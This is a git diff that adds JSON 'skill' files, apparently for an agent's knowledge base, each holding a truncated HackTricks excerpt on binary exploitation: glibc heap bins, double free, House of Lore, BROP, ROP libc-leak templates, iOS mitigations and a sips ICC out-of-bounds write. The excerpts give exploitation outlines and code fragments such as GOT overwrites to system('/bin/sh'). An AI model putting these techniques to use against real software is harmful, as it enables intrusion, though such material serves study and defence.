+ "id": "binary_exploitation_ae34cc6a646c",
+ "category": "binary-exploitation",
+ "title": "bins and memory allocations",
+ "description": "# Bins & Memory Allocations\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nIn order to improve the efficiency on how chunks are stored every chunk is not just in one linked list, but there are several types. These are the bins and there are 5 type of bins: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per",
+ "payloads": [
+ "# Bins & Memory Allocations",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "In order to improve the efficiency on how chunks are stored every chunk is not just in one linked list, but there are several types. These are the bins and there are 5 type of bins: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread.",
+ "The initial address to each unsorted, small and large bins is inside the same array. The index 0 is unused, 1 is the unsorted bin, bins 2-64 are small bins and bins 65-127 are large bins.",
+ "### Tcache (Per-Thread Cache) Bins",
+ "Even though threads try to have their own heap (see [Arenas](bins-and-memory-allocations.md#arenas) and [Subheaps](bins-and-memory-allocations.md#subheaps)), there is the possibility that a process with a lot of threads (like a web server) **will end sharing the heap with another threads**. In this case, the main solution is the use of **lockers**, which might **slow down significantly the threads**.",
+ "Therefore, a tcache is similar to a fast bin per thread in the way that it's a **single linked list** that doesn't merge chunks. Each thread has **64 singly-linked tcache bins**. Each bin can have a maximum of [7 same-size chunks](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323) ranging from [24 to 1032B on 64-bit systems and 12 to 516B on 32-bit systems](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315).",
+ "**When a thread frees** a chunk, **if it isn't too big** to be allocated in the tcache and the respective tcache bin **isn't full** (already 7 chunks), **it'll be allocated in there**. If it cannot go to the tcache, it'll need to wait for the heap lock to be able to perform the free operation globally.",
+ "When a **chunk is allocated**, if there is a free chunk of the needed size in the **Tcache it'll use it**, if not, it'll need to wait for the heap lock to be able to find one in the global bins or create a new one.\\",
+ "There's also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so in case it needs more, it'll find them in Tcache.",
+ "",
+ "Add a tcache chunk example",
+ "#include ",
+ "#include "
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_b3b1ebb1c651.json b/skills/binary_exploitation_b3b1ebb1c651.json
new file mode 100644
index 0000000..47429e0
--- /dev/null
+++ b/skills/binary_exploitation_b3b1ebb1c651.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_b3b1ebb1c651",
+ "category": "binary-exploitation",
+ "title": "ios physical uaf iosurface",
+ "description": "# iOS Physical Use After Free via IOSurface\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## iOS Exploit Mitigations\n\n- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple\u2019s trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from inje",
+ "payloads": [
+ "# iOS Physical Use After Free via IOSurface",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## iOS Exploit Mitigations",
+ "- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple\u2019s trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.",
+ "- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple\u2019s root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.",
+ "- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).",
+ "- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.",
+ "- **KASLR (Kernel ASLR)** applies the same randomization concept to the iOS kernel. By shuffling the kernel\u2019s base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.",
+ "- **Kernel Patch Protection (KPP)** also known as **AMCC (Apple Mobile File Integrity)** in iOS, continuously monitors the kernel\u2019s code pages to ensure they haven\u2019t been modified. If any tampering is detected\u2014such as an exploit trying to patch kernel functions or insert malicious code\u2014the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can\u2019t simply hook or patch kernel instructions without triggering a system crash.",
+ "- **Kernel Text Readonly Region (KTRR)** is a hardware-based security feature introduced on iOS devices. It uses the CPU\u2019s memory controller to mark the kernel\u2019s code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers\u2014and even privileged code\u2014from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.",
+ "- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.",
+ "- **Privilege Access never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.",
+ "- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.",
+ "## Physical use-after-free",
+ "This is a summary from the post from [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) moreover further information about exploit using this technique can be found in [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_b7d930ab21cd.json b/skills/binary_exploitation_b7d930ab21cd.json
new file mode 100644
index 0000000..8e45238
--- /dev/null
+++ b/skills/binary_exploitation_b7d930ab21cd.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_b7d930ab21cd",
+ "category": "binary-exploitation",
+ "title": "malloc and sysmalloc",
+ "description": "# malloc & sysmalloc\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Allocation Order Summary \n\n(No checks are explained in this summary and some case have been omitted for brevity)\n\n1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc`\n2. `_int_malloc` :\n 1. Tries to generate the arena if there isn't any\n 2. If any fast bin chunk of the correct size, use it\n 1. Fill tcache with other fast chunks\n 3",
+ "payloads": [
+ "# malloc & sysmalloc",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Allocation Order Summary ",
+ "(No checks are explained in this summary and some case have been omitted for brevity)",
+ "1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc`",
+ "2. `_int_malloc` :",
+ "1. Tries to generate the arena if there isn't any",
+ "2. If any fast bin chunk of the correct size, use it",
+ "1. Fill tcache with other fast chunks",
+ "3. If any small bin chunk of the correct size, use it",
+ "1. Fill tcache with other chunks of that size",
+ "4. If the requested size isn't for small bins, consolidate fast bin into unsorted bin",
+ "5. Check the unsorted bin, use the first chunk with enough space",
+ "1. If the found chunk is bigger, divide it to return a part and add the reminder back to the unsorted bin",
+ "2. If a chunk is of the same size as the size requested, use to to fill the tcache instead of returning it (until the tcache is full, then return the next one)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_b814a52038cd.json b/skills/binary_exploitation_b814a52038cd.json
new file mode 100644
index 0000000..b9de86e
--- /dev/null
+++ b/skills/binary_exploitation_b814a52038cd.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_b814a52038cd",
+ "category": "binary-exploitation",
+ "title": "double free",
+ "description": "# Double Free\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nIf you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the \"fast bin\"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing c",
+ "payloads": [
+ "# Double Free",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the \"fast bin\"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption.",
+ "Now, when you ask for new memory (using `malloc`), the allocator might give you a **block that's been freed twice**. This can lead to two different pointers pointing to the same memory location. If an attacker controls one of those pointers, they can change the contents of that memory, which can cause security issues or even allow them to execute code.",
+ "Example:",
+ "#include ",
+ "#include ",
+ "int main() {",
+ "// Allocate memory for three chunks",
+ "char *a = (char *)malloc(10);",
+ "char *b = (char *)malloc(10);",
+ "char *c = (char *)malloc(10);",
+ "char *d = (char *)malloc(10);",
+ "char *e = (char *)malloc(10);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/double-free.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_b880804a01a6.json b/skills/binary_exploitation_b880804a01a6.json
new file mode 100644
index 0000000..624cd57
--- /dev/null
+++ b/skills/binary_exploitation_b880804a01a6.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_b880804a01a6",
+ "category": "binary-exploitation",
+ "title": "windows exploiting basic guide oscp lvl",
+ "description": "# Windows Exploiting (Basic Guide - OSCP lvl)\n\n{{#include ../banners/hacktricks-training.md}}\n\n> [!TIP]\n> Looking for post-OSCP kernel primitives? Modern registry hive corruption chains for deterministic SYSTEM shells are covered here:\n\n{{#ref}}\n../windows-hardening/windows-local-privilege-escalation/windows-registry-hive-exploitation.md\n{{#endref}}\n\n## **Start installing the SLMail service**\n\n## Restart SLMail service\n\nEvery time you need to **restart the service SLMail** you can do it using th",
+ "payloads": [
+ "# Windows Exploiting (Basic Guide - OSCP lvl)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "> [!TIP]",
+ "> Looking for post-OSCP kernel primitives? Modern registry hive corruption chains for deterministic SYSTEM shells are covered here:",
+ "{{#ref}}",
+ "../windows-hardening/windows-local-privilege-escalation/windows-registry-hive-exploitation.md",
+ "{{#endref}}",
+ "## **Start installing the SLMail service**",
+ "## Restart SLMail service",
+ "Every time you need to **restart the service SLMail** you can do it using the windows console:",
+ "net start slmail",
+ ".png>)",
+ "## Very basic python exploit template",
+ "```python",
+ "#!/usr/bin/python"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_bc5f7b5c52c3.json b/skills/binary_exploitation_bc5f7b5c52c3.json
new file mode 100644
index 0000000..c09c1e7
--- /dev/null
+++ b/skills/binary_exploitation_bc5f7b5c52c3.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_bc5f7b5c52c3",
+ "category": "binary-exploitation",
+ "title": "rop leaking libc template",
+ "description": "# Leaking libc - template\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\n```python:template.py\nfrom pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools\n\n\n###################\n### CONNECTION ####\n###################\nLOCAL = False\nREMOTETTCP = True\nREMOTESSH = False\nGDB = False\nUSE_ONE_GADGET = False\n\nLOCAL_BIN = \"./vuln\"\nREMOTE_BIN = \"~/vuln\" #For ssh\nLIBC = \"\" #ELF(\"/lib/x86_64-linux-gnu/libc.so.6\") #Set library path when know it\nENV =",
+ "payloads": [
+ "# Leaking libc - template",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "```python:template.py",
+ "from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools",
+ "###################",
+ "### CONNECTION ####",
+ "###################",
+ "LOCAL = False",
+ "REMOTETTCP = True",
+ "REMOTESSH = False",
+ "GDB = False",
+ "USE_ONE_GADGET = False",
+ "LOCAL_BIN = \"./vuln\"",
+ "REMOTE_BIN = \"~/vuln\" #For ssh",
+ "LIBC = \"\" #ELF(\"/lib/x86_64-linux-gnu/libc.so.6\") #Set library path when know it"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_c4cda9f9daa9.json b/skills/binary_exploitation_c4cda9f9daa9.json
new file mode 100644
index 0000000..631beb6
--- /dev/null
+++ b/skills/binary_exploitation_c4cda9f9daa9.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_c4cda9f9daa9",
+ "category": "binary-exploitation",
+ "title": "common exploiting problems unsafe relocation fixups",
+ "description": "# Unsafe Relocation Fixups in Asset Loaders\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Why asset relocations matter\n\nMany legacy game engines (Granny 3D, Gamebryo, etc.) load complex assets by:\n\n1. Parsing a header and section table.\n2. Allocating one heap buffer per section.\n3. Building a `SectionArray` that stores the base pointer of every section.\n4. Applying relocation tables so that pointers embedded inside the section data get patched to the right target section + offset.\n\nWhen th",
+ "payloads": [
+ "# Unsafe Relocation Fixups in Asset Loaders",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Why asset relocations matter",
+ "Many legacy game engines (Granny 3D, Gamebryo, etc.) load complex assets by:",
+ "1. Parsing a header and section table.",
+ "2. Allocating one heap buffer per section.",
+ "3. Building a `SectionArray` that stores the base pointer of every section.",
+ "4. Applying relocation tables so that pointers embedded inside the section data get patched to the right target section + offset.",
+ "When the relocation handler blindly trusts attacker-controlled metadata, every relocation becomes a potential arbitrary read/write primitive. In *Anno 1404: Venice*, `granny2.dll` ships the following helper:",
+ "",
+ "`GrannyGRNFixUp_0` (trimmed)",
+ "int *__cdecl GrannyGRNFixUp_0(DWORD RelocationCount,",
+ "Relocation *PointerFixupArray,",
+ "int *SectionArray,",
+ "char *destination)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-exploiting-problems-unsafe-relocation-fixups.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_c50732d27c2a.json b/skills/binary_exploitation_c50732d27c2a.json
new file mode 100644
index 0000000..ffe4747
--- /dev/null
+++ b/skills/binary_exploitation_c50732d27c2a.json
@@ -0,0 +1,26 @@
+{
+ "id": "binary_exploitation_c50732d27c2a",
+ "category": "binary-exploitation",
+ "title": "array indexing",
+ "description": "# Array Indexing\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis category includes all vulnerabilities that occur because it is possible to overwrite certain data through errors in the handling of indexes in arrays. It's a very wide category with no specific methodology as the exploitation mechanism relays completely on the conditions of the vulnerability.\n\nHowever he you can find some nice **examples**:\n\n- [https://guyinatuxedo.github.io/11-index/swampctf19_dreamheap",
+ "payloads": [
+ "# Array Indexing",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This category includes all vulnerabilities that occur because it is possible to overwrite certain data through errors in the handling of indexes in arrays. It's a very wide category with no specific methodology as the exploitation mechanism relays completely on the conditions of the vulnerability.",
+ "However he you can find some nice **examples**:",
+ "- [https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html)",
+ "- There are **2 colliding arrays**, one for **addresses** where data is stored and one with the **sizes** of that data. It's possible to overwrite one from the other, enabling to write an arbitrary address indicating it as a size. This allows to write the address of the `free` function in the GOT table and then overwrite it with the address to `system`, and call free from a memory with `/bin/sh`.",
+ "- [https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html)",
+ "- 64 bits, no nx. Overwrite a size to get a kind of buffer overflow where every thing is going to be used a double number and sorted from smallest to biggest so it's needed to create a shellcode that fulfil that requirement, taking into account that the canary shouldn't be moved from it's position and finally overwriting the RIP with an address to ret, that fulfil he previous requirements and putting the biggest address a new address pointing to the start of the stack (leaked by the program) so it's possible to use the ret to jump there.",
+ "- [https://faraz.faith/2019-10-20-secconctf-2019-sum/](https://faraz.faith/2019-10-20-secconctf-2019-sum/)",
+ "- 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.",
+ "- [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)",
+ "- 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/array-indexing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_c849a937c8ab.json b/skills/binary_exploitation_c849a937c8ab.json
new file mode 100644
index 0000000..7903d36
--- /dev/null
+++ b/skills/binary_exploitation_c849a937c8ab.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_c849a937c8ab",
+ "category": "binary-exploitation",
+ "title": "brop blind return oriented programming",
+ "description": "# BROP - Blind Return Oriented Programming\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\\\nThis attack is based on the following scenario:\n\n- A stack vulnerability and knowledge of how to trigger it.\n- A server application that restarts after a crash.\n\n## Attack\n\n### **1. Find vulnerable offset** sending one more character until a malfunct",
+ "payloads": [
+ "# BROP - Blind Return Oriented Programming",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\\",
+ "This attack is based on the following scenario:",
+ "- A stack vulnerability and knowledge of how to trigger it.",
+ "- A server application that restarts after a crash.",
+ "## Attack",
+ "### **1. Find vulnerable offset** sending one more character until a malfunction of the server is detected",
+ "### **2. Brute-force canary** to leak it",
+ "### **3. Brute-force stored RBP and RIP** addresses in the stack to leak them",
+ "You can find more information about these processes [here (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) and [here (BF Addresses in the Stack)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md).",
+ "### **4. Find the stop gadget**",
+ "This gadget basically allows to confirm that something interesting was executed by the ROP gadget because the execution didn't crash. Usually, this gadget is going to be something that **stops the execution** and it's positioned at the end of the ROP chain when looking for ROP gadgets to confirm a specific ROP gadget was executed",
+ "### **5. Find BROP gadget**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_cbe8bcc9c61c.json b/skills/binary_exploitation_cbe8bcc9c61c.json
new file mode 100644
index 0000000..3764a80
--- /dev/null
+++ b/skills/binary_exploitation_cbe8bcc9c61c.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_cbe8bcc9c61c",
+ "category": "binary-exploitation",
+ "title": "libc protections",
+ "description": "# Libc Protections\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Chunk Alignment Enforcement\n\n**Malloc** allocates memory in **8-byte (32-bit) or 16-byte (64-bit) groupings**. This means the end of chunks in 32-bit systems should align with **0x8**, and in 64-bit systems with **0x0**. The security feature checks that each chunk **aligns correctly** at these specific locations before using a pointer from a bin.\n\n### Security Benefits\n\nThe enforcement of chunk alignment in 64-bit systems ",
+ "payloads": [
+ "# Libc Protections",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Chunk Alignment Enforcement",
+ "**Malloc** allocates memory in **8-byte (32-bit) or 16-byte (64-bit) groupings**. This means the end of chunks in 32-bit systems should align with **0x8**, and in 64-bit systems with **0x0**. The security feature checks that each chunk **aligns correctly** at these specific locations before using a pointer from a bin.",
+ "### Security Benefits",
+ "The enforcement of chunk alignment in 64-bit systems significantly enhances Malloc's security by **limiting the placement of fake chunks to only 1 out of every 16 addresses**. This complicates exploitation efforts, especially in scenarios where the user has limited control over input values, making attacks more complex and harder to execute successfully.",
+ "- **Fastbin Attack on \\_\\_malloc_hook**",
+ "The new alignment rules in Malloc also thwart a classic attack involving the `__malloc_hook`. Previously, attackers could manipulate chunk sizes to **overwrite this function pointer** and gain **code execution**. Now, the strict alignment requirement ensures that such manipulations are no longer viable, closing a common exploitation route and enhancing overall security.",
+ "## Pointer Mangling on fastbins and tcache",
+ "**Pointer Mangling** is a security enhancement used to protect **fastbin and tcache Fd pointers** in memory management operations. This technique helps prevent certain types of memory exploit tactics, specifically those that do not require leaked memory information or that manipulate memory locations directly relative to known positions (relative **overwrites**).",
+ "The core of this technique is an obfuscation formula:",
+ "**`New_Ptr = (L >> 12) XOR P`**",
+ "- **L** is the **Storage Location** of the pointer.",
+ "- **P** is the actual **fastbin/tcache Fd Pointer**.",
+ "The reason for the bitwise shift of the storage location (L) by 12 bits to the right before the XOR operation is critical. This manipulation addresses a vulnerability inherent in the deterministic nature of the least significant 12 bits of memory addresses, which are typically predictable due to system architecture constraints. By shifting the bits, the predictable portion is moved out of the equation, enhancing the randomness of the new, mangled pointer and thereby safeguarding against exploits that rely on the predictability of these bits."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_dd3c98e1ff16.json b/skills/binary_exploitation_dd3c98e1ff16.json
new file mode 100644
index 0000000..75b9ad1
--- /dev/null
+++ b/skills/binary_exploitation_dd3c98e1ff16.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_dd3c98e1ff16",
+ "category": "binary-exploitation",
+ "title": "house of lore",
+ "description": "# House of Lore | Small bin Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### Code\n\n- Check the one from [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/)\n - This isn't working\n- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)\n - This isn't working even if it tries t",
+ "payloads": [
+ "# House of Lore | Small bin Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### Code",
+ "- Check the one from [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/)",
+ "- This isn't working",
+ "- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c)",
+ "- This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`",
+ "- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)",
+ "### Goal",
+ "- Insert a **fake small chunk in the small bin so then it's possible to allocate it**.\\",
+ "Note that the small chunk added is the fake one the attacker creates and not a fake one in an arbitrary position.",
+ "### Requirements",
+ "- Create 2 fake chunks and link them together and with the legit chunk in the small bin:",
+ "- `fake0.bk` -> `fake1`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-lore.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_de389b5dd11a.json b/skills/binary_exploitation_de389b5dd11a.json
new file mode 100644
index 0000000..c516ee8
--- /dev/null
+++ b/skills/binary_exploitation_de389b5dd11a.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_de389b5dd11a",
+ "category": "binary-exploitation",
+ "title": "unlink",
+ "description": "# unlink\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n### Code\n\n```c\n// From https://github.com/bminor/glibc/blob/master/malloc/malloc.c\n\n/* Take a chunk off a bin list. */\nstatic void\nunlink_chunk (mstate av, mchunkptr p)\n{\n if (chunksize (p) != prev_size (next_chunk (p)))\n malloc_printerr (\"corrupted size vs. prev_size\");\n\n mchunkptr fd = p->fd;\n mchunkptr bk = p->bk;\n\n if (__builtin_expect (fd->bk != p || bk->fd != p, 0))\n malloc_printerr (\"corrupted double-linked list\");",
+ "payloads": [
+ "# unlink",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "### Code",
+ "// From https://github.com/bminor/glibc/blob/master/malloc/malloc.c",
+ "/* Take a chunk off a bin list. */",
+ "static void",
+ "unlink_chunk (mstate av, mchunkptr p)",
+ "if (chunksize (p) != prev_size (next_chunk (p)))",
+ "malloc_printerr (\"corrupted size vs. prev_size\");",
+ "mchunkptr fd = p->fd;",
+ "mchunkptr bk = p->bk;",
+ "if (__builtin_expect (fd->bk != p || bk->fd != p, 0))",
+ "malloc_printerr (\"corrupted double-linked list\");",
+ "fd->bk = bk;",
+ "bk->fd = fd;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_df78802a04be.json b/skills/binary_exploitation_df78802a04be.json
new file mode 100644
index 0000000..f1dda4f
--- /dev/null
+++ b/skills/binary_exploitation_df78802a04be.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_df78802a04be",
+ "category": "binary-exploitation",
+ "title": "aw2exec sips icc profile",
+ "description": "# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nAn out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `)",
+ "payloads": [
+ "# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).",
